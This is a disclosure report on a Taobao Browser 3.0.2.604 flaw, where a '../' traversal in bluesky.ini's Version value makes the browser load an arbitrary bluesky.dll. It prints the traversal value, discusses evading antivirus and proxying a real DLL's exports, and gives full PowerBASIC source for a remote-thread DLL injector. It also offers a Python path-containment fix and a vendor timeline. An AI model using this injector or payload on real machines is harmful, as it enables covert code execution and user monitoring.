2013-06-12: Details reported to the vendor, awaiting vendor action
2013-06-14: Vendor has confirmed; details disclosed to the vendor only
2013-06-17: Details opened to third-party security partners
2013-08-08: Details opened to core white hats and experts in related fields
2013-08-18: Details opened to regular white hats
2013-08-28: Details opened to intern white hats
2013-09-10: Details disclosed to the public
Taobao Browser 3.0.2.604 (2013.3.20): modifying a configuration file can lead to local DLL injection
On the computer at home, Taobao Browser version 3.0.2.604 (2013.3.20) loads the framework library bluesky.dll at startup. The program determines the path of this file from bluesky.ini, so changing the contents of the configuration file
\TaoBrowser\bluesky.ini
to
[Common]
Version = ../../../../../../../../1111
makes the program load (assuming the install path is c:\taobao\) c:\taobao\..\..\..\..\..\..\..\1111\bluesky.dll at startup, which is c:\1111\bluesky.dll. Of course this is not limited to that one DLL; once this DLL is overwritten, the whole window no longer starts at all. There are many more files in this directory, and by checking how each relates to a feature, one could also overwrite a particular DLL so that a malicious trojan is triggered when the user runs that feature (for example AliUpdate.dll for the update function).

Suppose bluesky.dll is a malicious trojan: as soon as the user opens Taobao Browser, the file is loaded by the browser, and if the antivirus has no signature for it, it lets the file through by default (probably a "white plus black" case, that is, a trusted signed executable loading an untrusted DLL; the home machine runs 360 Antivirus, and it did not prompt even for the injection). Once the DLL is injected it can monitor the user's actions, perform other dangerous operations, etc.

Possible ways the vulnerability could be used: the configuration file could be modified by a trojan that 1) drops a file and 2) edits the configuration. Both actions closely resemble normal program behaviour, so they generally do not reach the behaviour score that triggers an antivirus's proactive defence. As for impersonation, if the target is, say, Alixxx.dll, an attacker can build a fake Alixxx.dll whose export table matches the real one; when the browser calls the fake Alixxx.dll, since the real one is still there, the fake can call the real Alixxx.dll's functions and return the results to the browser while also running its own code.
The DLL loaded into TAOBROWSER.EXE
The injection window shown by the DLL:
Injection succeeded (-1 = failure, 0 = success):
Since this is the machine my mother uses, no compiler is installed on it; I grabbed a PowerBASIC build on the spot and reused code I had written earlier, so the functionality is crude and only meant as a test:
#COMPILE DLL
#DIM ALL
%USEMACROS = 1
#INCLUDE "D:\PowerBasic\MAINDIR\WinAPI\Win32API.inc"
GLOBAL ghInstance AS DWORD

'-- INJECT.INC --------------------------------------------------------------
DECLARE FUNCTION Get_hModule(BYVAL PID AS DWORD, DllPath$) AS DWORD
DECLARE FUNCTION Inject_DLL(BYVAL PID AS DWORD, DllPath$) AS LONG
DECLARE FUNCTION Eject_DLL(BYVAL PID AS DWORD, BYVAL hModule AS DWORD) AS LONG

'-- Declares not found in WIN32API.INC
DECLARE FUNCTION EnumProcessModules LIB "PSAPI.DLL" ALIAS "EnumProcessModules" _
    (BYVAL hProcess AS DWORD, hModule AS DWORD, _
     BYVAL cb AS DWORD, cbNeeded AS DWORD) AS DWORD
DECLARE FUNCTION GetModuleFileNameEx LIB "PSAPI.DLL" ALIAS "GetModuleFileNameExA" _
    (BYVAL hProcess AS DWORD, BYVAL hModule AS DWORD, _
     Filename AS ASCIIZ, BYVAL nSize AS DWORD) AS DWORD

'====================
FUNCTION Get_hModule(BYVAL PID AS DWORD, DllPath$) AS DWORD
'-- Returns handle to running module specified in DllPath$, or zero if not found
'-- PID = process ID of running process; DllPath$ = path+filename of DLL
REGISTER i&, result&
LOCAL cb, cbNeeded, nModules AS LONG, hProcess, found, hModules() AS DWORD
LOCAL dll$, ModuleName AS ASCIIZ * %MAX_PATH
hProcess = OpenProcess(%PROCESS_QUERY_INFORMATION OR %PROCESS_VM_READ, %FALSE, PID)
IF hProcess THEN
    cb = 100
    DO
        REDIM hModules(1 TO cb \ 4)
        result = EnumProcessModules(hProcess, hModules(1), cb, cbNeeded)
        IF result = 0 THEN 'call failed
            cbNeeded = 0 : EXIT DO
        END IF
        IF cb > cbNeeded THEN EXIT DO
        cb = cb * 2
    LOOP
    nModules = cbNeeded \ 4
    DLL = UCASE$(DllPath$)
    FOR i = 1 TO nModules
        result = GetModuleFileNameEx(hProcess, hModules(i), _
                                     ModuleName, SIZEOF(ModuleName))
        IF result THEN
            IF UCASE$(RTRIM$(ModuleName,$NUL)) = DLL THEN
                found = hModules(i) : EXIT FOR
            END IF
        END IF
    NEXT i
    CloseHandle hProcess
END IF 'hProcess
FUNCTION = found
END FUNCTION

'====================
FUNCTION Inject_DLL(BYVAL PID AS DWORD, DllPath$) AS LONG
REGISTER hProcess&, hThread&
LOCAL ecode&, pLoadLibraryA, pRemoteBuffer AS DWORD
ecode = -1 'default to error
hProcess = OpenProcess(%PROCESS_CREATE_THREAD OR %PROCESS_QUERY_INFORMATION OR _
                       %PROCESS_VM_OPERATION OR %PROCESS_VM_READ OR _
                       %PROCESS_VM_WRITE, %FALSE, PID)
IF hProcess THEN
    pLoadLibraryA = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA")
    pRemoteBuffer = VirtualAllocEx(hProcess, BYVAL %NULL, LEN(DllPath$), _
                                   %MEM_COMMIT, %PAGE_READWRITE)
    IF pRemoteBuffer AND pLoadLibraryA THEN
        IF WriteProcessMemory(BYVAL hProcess, BYVAL pRemoteBuffer, _
                              BYVAL STRPTR(DllPath$), LEN(DllPath$), %NULL) THEN
            hThread = CreateRemoteThread(BYVAL hProcess, BYVAL %NULL, 0&, _
                                         BYVAL pLoadLibraryA, BYVAL pRemoteBuffer, _
                                         0, %NULL)
            IF hThread THEN
                WaitForSingleObject hThread, %INFINITE
                CloseHandle hThread
                ecode = 0
            END IF
        END IF
        VirtualFreeEx hProcess, pRemoteBuffer, 0, %MEM_RELEASE
    END IF 'pRemoteBuffer AND pLoadLibraryA
    CloseHandle hProcess
END IF 'hProcess
FUNCTION = ecode
END FUNCTION

'====================
FUNCTION Eject_DLL(BYVAL PID AS DWORD, BYVAL hModule AS DWORD) AS LONG
REGISTER hProcess&, hThread&
LOCAL ecode&, pFreeLibrary, pRemoteBuffer AS DWORD
ecode = -1 'default to error
hProcess = OpenProcess(%PROCESS_CREATE_THREAD OR %PROCESS_QUERY_INFORMATION OR _
                       %PROCESS_VM_OPERATION OR %PROCESS_VM_READ OR _
                       %PROCESS_VM_WRITE, %FALSE, PID)
IF hProcess THEN
    pFreeLibrary = GetProcAddress(GetModuleHandle("Kernel32"), "FreeLibrary")
    IF pFreeLibrary THEN
        hThread = CreateRemoteThread(BYVAL hProcess, BYVAL %NULL, 0&, _
                                     BYVAL pFreeLibrary, BYVAL hModule, 0, %NULL)
        IF hThread THEN
            WaitForSingleObject hThread, %INFINITE
            CloseHandle hThread
            ecode = 0
        END IF
    END IF
    CloseHandle hProcess
END IF 'hProcess
FUNCTION = ecode
END FUNCTION
'-- END INJECT.INC ----------------------------------------------------------

FUNCTION LIBMAIN (BYVAL hInstance   AS LONG, _
                  BYVAL fwdReason   AS LONG, _
                  BYVAL lpvReserved AS LONG) AS LONG
    DIM sFileName AS ASCIIZ * 256
    DIM sModuleFilePath AS ASCIIZ * %MAX_PATH
    DIM sNameCut AS ASCIIZ * %MAX_PATH
    LOCAL ecode&, hmodule, pid AS DWORD
    LOCAL DllPath$, exepath AS ASCIIZ * %MAX_PATH
    GetModuleFileName GetModuleHandle(""), exepath, SIZEOF(exepath)
    DllPath = "D:\PowerBasic\MAINDIR\t2.dll"
    IF pid = 0 THEN pid = VAL(INPUTBOX$("Enter target process id", DllPath))
    IF pid = 0 THEN EXIT FUNCTION
    hModule = Get_hModule(pid, DllPath)
    IF hModule THEN
        MSGBOX "已被注入,尝试清除中",,DllPath
        ecode = Eject_DLL(pid, hModule)
        MSGBOX "Final eject ecode:" + STR$(ecode),,DllPath
    ELSE
        MSGBOX "未被注入,尝试注入中",,DllPath
        ecode = Inject_DLL(pid, DllPath)
        MSGBOX "Final inject ecode:" + STR$(ecode),,DllPath
    END IF
'    SELECT CASE fwdReason
'    CASE %DLL_PROCESS_ATTACH
'        ghInstance = hInstance
'        FUNCTION = 1   'success!
    GetModuleFileName(hInstance, sFileName, 255)
    CALL GetModuleFileName( CDWD(&H0), sModuleFilePath, CDWD(%MAX_PATH) )
'    sNameCut = Parse$( sModuleFilePath, "\", ParseCount(sModuleFilePath, "\") )
'    sModuleFilePath = RTrim$( sModuleFilePath, sNameCut )
    MSGBOX "The dll" + sFileName + " is being attached into : " + sModuleFilePath
'    FUNCTION = 0   'failure!  This will prevent the EXE from running.
'    CASE %DLL_PROCESS_DETACH
'        FUNCTION = 1   'success!
'    CASE %DLL_THREAD_ATTACH
'        FUNCTION = 1   'success!
'    CASE %DLL_THREAD_DETACH
'        FUNCTION = 1   'success!
'    END SELECT
END FUNCTION
The DLL and the settings
Filter out relative-path sequences such as ../ properly.
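As an added illustration (not code from this report or from Taobao Browser), the Python below models how the loader uses the [Common] Version value from bluesky.ini: naive_framework_dll shows where the report's traversal value lands under the assumed install path c:\taobao, and resolve_framework_dll is the containment check a loader should apply instead of merely stripping "../". The benign Version value is an assumption.

```python
from typing import Optional
from pathlib import PureWindowsPath
import configparser

# Constructed bluesky.ini contents: the first Version value is the traversal
# from the report, the second is an assumed benign value of the same shape.
MALICIOUS_INI = "[Common]\nVersion = ../../../../../../../../1111\n"
BENIGN_INI = "[Common]\nVersion = 3.0.2.604\n"


def read_version(ini_text: str) -> str:
    """Read [Common] Version from INI text, as the loader does from bluesky.ini."""
    cp = configparser.ConfigParser()
    cp.read_string(ini_text)
    return cp["Common"]["Version"].strip()


def normalize(path: PureWindowsPath) -> PureWindowsPath:
    """Collapse '.' and '..' lexically; PurePath keeps '..' components as-is."""
    parts = path.parts[1:] if path.anchor else path.parts
    stack = []
    for part in parts:
        if part == "..":
            if stack:
                stack.pop()
        elif part != ".":
            stack.append(part)
    return PureWindowsPath(path.anchor, *stack)


def naive_framework_dll(install_dir: str, version: str) -> PureWindowsPath:
    """What a loader that trusts Version unconditionally ends up opening."""
    return normalize(PureWindowsPath(install_dir) / version / "bluesky.dll")


def resolve_framework_dll(install_dir: str, version: str) -> Optional[PureWindowsPath]:
    """Hardened variant: the DLL path, or None when Version is rejected.

    A denylist on '../' alone is bypassable ('..\\', drive-relative or rooted
    values), so the candidate is normalized and must stay under install_dir.
    """
    root = normalize(PureWindowsPath(install_dir))
    if not root.is_absolute():
        raise ValueError("install_dir must be an absolute path")
    ver = PureWindowsPath(version)
    if ver.drive or ver.root:          # 'D:x', '\\x', '\\\\srv\\share\\x', 'C:\\x'
        return None
    candidate = normalize(root / ver / "bluesky.dll")
    try:
        candidate.relative_to(root)
    except ValueError:                 # escaped the install directory
        return None
    return candidate
```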
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2013-06-14 11:30
Thank you for your support and attention; we are fixing this issue ~ ^_^
None yet